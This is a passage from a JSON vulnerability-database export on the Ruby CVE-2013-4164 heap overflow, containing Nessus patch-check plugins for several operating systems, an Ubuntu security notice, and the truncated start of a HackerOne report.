pkgver:\"1.9.3_p484\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"ruby\", pkgver:\"1.9.3_p484\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"ruby\", pkgver:\"1.9.3_p484\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"ruby\", pkgver:\"1.9.3_p484\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"ruby\", pkgver:\"1.9.3_p484\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"ruby\", pkgver:\"1.9.3_p484\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T01:20:32", "description": "Heap-based buffer overflow in Ruby 1.8, 1.9 before 1.9.3-p484, 2.0\nbefore 2.0.0-p353, 2.1 before 2.1.0 preview2, and trunk before\nrevision 43780 allows context-dependent attackers to cause a denial of\nservice (segmentation fault) and possibly execute arbitrary code via a\nstring that is converted to a floating point value, as demonstrated\nusing (1) the to_f method or (2) JSON.parse.", "edition": 24, "published": "2013-11-26T00:00:00", "title": "Amazon Linux AMI : ruby19 (ALAS-2013-247)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:rubygem19-rdoc", "p-cpe:/a:amazon:linux:rubygem19-rake", "p-cpe:/a:amazon:linux:rubygem19-io-console", "p-cpe:/a:amazon:linux:ruby19-irb", "p-cpe:/a:amazon:linux:rubygems19-devel", "p-cpe:/a:amazon:linux:rubygems19", "p-cpe:/a:amazon:linux:ruby19-doc", "p-cpe:/a:amazon:linux:rubygem19-bigdecimal", "p-cpe:/a:amazon:linux:ruby19-debuginfo", "p-cpe:/a:amazon:linux:rubygem19-minitest", "p-cpe:/a:amazon:linux:rubygem19-json", "p-cpe:/a:amazon:linux:ruby19-devel", "p-cpe:/a:amazon:linux:ruby19-libs", "p-cpe:/a:amazon:linux:ruby19", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2013-247.NASL", "href": "https://www.tenable.com/plugins/nessus/71078", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2013-247.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(71078);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2013-4164\");\n script_xref(name:\"ALAS\", value:\"2013-247\");\n\n script_name(english:\"Amazon Linux AMI : ruby19 (ALAS-2013-247)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Heap-based buffer overflow in Ruby 1.8, 1.9 before 1.9.3-p484, 2.0\nbefore 2.0.0-p353, 2.1 before 2.1.0 preview2, and trunk before\nrevision 43780 allows context-dependent attackers to cause a denial of\nservice (segmentation fault) and possibly execute arbitrary code via a\nstring that is converted to a floating point value, as demonstrated\nusing (1) the to_f method or (2) JSON.parse.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2013-247.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update ruby19' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby19\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby19-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby19-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby19-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby19-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby19-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem19-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem19-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem19-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem19-minitest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem19-rake\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem19-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems19\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems19-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ruby19-1.9.3.484-31.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby19-debuginfo-1.9.3.484-31.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby19-devel-1.9.3.484-31.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby19-doc-1.9.3.484-31.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby19-irb-1.9.3.484-31.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby19-libs-1.9.3.484-31.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem19-bigdecimal-1.1.0-31.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem19-io-console-0.3-31.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem19-json-1.5.5-31.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem19-minitest-2.5.1-31.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem19-rake-0.9.2.2-31.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem19-rdoc-3.9.5-31.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems19-1.8.23-31.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems19-devel-1.8.23-31.55.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby19 / ruby19-debuginfo / ruby19-devel / ruby19-doc / ruby19-irb / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:11:27", "description": "Update to Ruby 2.0.0-p353. This includes fix to an overflow in\nfloating point number parsing found in Ruby currently being shipped on\nFedora 20. This vulnerability has been assigned the CVE identifier\nCVE-2013-4164. This new rpm should fix this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-12-14T00:00:00", "title": "Fedora 20 : ruby-2.0.0.353-16.fc20 (2013-22393)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "modified": "2013-12-14T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:ruby"], "id": "FEDORA_2013-22393.NASL", "href": "https://www.tenable.com/plugins/nessus/71410", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-22393.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71410);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-4164\");\n script_bugtraq_id(63873);\n script_xref(name:\"FEDORA\", value:\"2013-22393\");\n\n script_name(english:\"Fedora 20 : ruby-2.0.0.353-16.fc20 (2013-22393)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Ruby 2.0.0-p353. This includes fix to an overflow in\nfloating point number parsing found in Ruby currently being shipped on\nFedora 20. This vulnerability has been assigned the CVE identifier\nCVE-2013-4164. This new rpm should fix this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1033546\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1034122\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-December/123510.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e134e2b3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"ruby-2.0.0.353-16.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:01:11", "description": "The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - Heap-based buffer overflow in Ruby 1.8, 1.9 before\n 1.9.3-p484, 2.0 before 2.0.0-p353, 2.1 before 2.1.0\n preview2, and trunk before revision 43780 allows\n context-dependent attackers to cause a denial of service\n (segmentation fault) and possibly execute arbitrary code\n via a string that is converted to a floating point\n value, as demonstrated using (1) the to_f method or (2)\n JSON.parse. (CVE-2013-4164)", "edition": 24, "published": "2015-01-19T00:00:00", "title": "Oracle Solaris Third-Party Patch Update : ruby (cve_2013_4164_buffer_errors)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "modified": "2015-01-19T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:ruby", "cpe:/o:oracle:solaris:11.2"], "id": "SOLARIS11_RUBY_20140731.NASL", "href": "https://www.tenable.com/plugins/nessus/80758", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80758);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-4164\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : ruby (cve_2013_4164_buffer_errors)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - Heap-based buffer overflow in Ruby 1.8, 1.9 before\n 1.9.3-p484, 2.0 before 2.0.0-p353, 2.1 before 2.1.0\n preview2, and trunk before revision 43780 allows\n context-dependent attackers to cause a denial of service\n (segmentation fault) and possibly execute arbitrary code\n via a string that is converted to a floating point\n value, as demonstrated using (1) the to_f method or (2)\n JSON.parse. (CVE-2013-4164)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blogs.oracle.com/sunsecurity/cve-2013-4164-buffer-errors-vulnerability-in-ruby\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11.2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:ruby\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^ruby$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.2.0.0.0.0\", sru:\"11.2 SRU 0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : ruby\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_warning(port:0, extra:error_extra);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"ruby\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T03:57:51", "description": "The remote Mac OS X 10.9 host has a version of OS X Server installed\nthat is prior to 3.1.2. It is, therefore, affected by a heap-based\nbuffer overflow vulnerability in the Ruby component that occurs when\nconverting a string to a floating point value. A remote attacker can\nexploit this, via a specially crafted request to Profile Manager or to\na Ruby script, to cause a denial of service condition or the execution\nof arbitrary code.", "edition": 24, "published": "2014-05-21T00:00:00", "title": "Mac OS X : OS X Server < 3.1.2 Heap-Based Buffer Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:apple:mac_os_x_server"], "id": "MACOSX_SERVER_3_1_2.NASL", "href": "https://www.tenable.com/plugins/nessus/74124", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74124);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2013-4164\");\n script_bugtraq_id(63873);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2014-15-20-1\");\n\n script_name(english:\"Mac OS X : OS X Server < 3.1.2 Heap-Based Buffer Overflow\");\n script_summary(english:\"Checks OS X Server version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is missing a security update for OS X Server.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X 10.9 host has a version of OS X Server installed\nthat is prior to 3.1.2. It is, therefore, affected by a heap-based\nbuffer overflow vulnerability in the Ruby component that occurs when\nconverting a string to a floating point value. A remote attacker can\nexploit this, via a specially crafted request to Profile Manager or to\na Ruby script, to cause a denial of service condition or the execution\nof arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT6248\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/532166/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Mac OS X Server version 3.1.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:mac_os_x_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_server_services.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Server/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nif (!ereg(pattern:\"Mac OS X 10\\.9([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.9\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Server/Version\");\n\nfixed_version = \"3.1.2\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"OS X Server\", version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:11:28", "description": "Update to Ruby 2.0.0-p353. This includes fix to an overflow in\nfloating point number parsing found in Ruby currently being shipped on\nFedora 20. This vulnerability has been assigned the CVE identifier\nCVE-2013-4164. This new rpm should fix this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-12-04T00:00:00", "title": "Fedora 19 : ruby-2.0.0.353-16.fc19 (2013-22423)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "modified": "2013-12-04T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:ruby"], "id": "FEDORA_2013-22423.NASL", "href": "https://www.tenable.com/plugins/nessus/71184", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-22423.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71184);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-4164\");\n script_bugtraq_id(63873);\n script_xref(name:\"FEDORA\", value:\"2013-22423\");\n\n script_name(english:\"Fedora 19 : ruby-2.0.0.353-16.fc19 (2013-22423)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Ruby 2.0.0-p353. This includes fix to an overflow in\nfloating point number parsing found in Ruby currently being shipped on\nFedora 20. This vulnerability has been assigned the CVE identifier\nCVE-2013-4164. This new rpm should fix this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1033546\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1034122\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-December/123119.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?01625315\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"ruby-2.0.0.353-16.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2065", "CVE-2013-4164"], "description": "Charlie Somerville discovered that Ruby incorrectly handled floating point \nnumber conversion. An attacker could possibly use this issue with an \napplication that converts text to floating point numbers to cause the \napplication to crash, resulting in a denial of service, or possibly execute \narbitrary code. (CVE-2013-4164)\n\nVit Ondruch discovered that Ruby did not perform taint checking for certain \nfunctions. An attacker could possibly use this issue to bypass certain \nintended restrictions. (CVE-2013-2065)", "edition": 5, "modified": "2013-11-27T00:00:00", "published": "2013-11-27T00:00:00", "id": "USN-2035-1", "href": "https://ubuntu.com/security/notices/USN-2035-1", "title": "Ruby vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:12", "bulletinFamily": "bugbounty", "bounty": 1500.0, "cvelist": ["CVE-2009-0689", "CVE-2013-4164"], "description": "Any time a string is converted to a floating point value, a specially crafted string can cause a heap overflow. This can 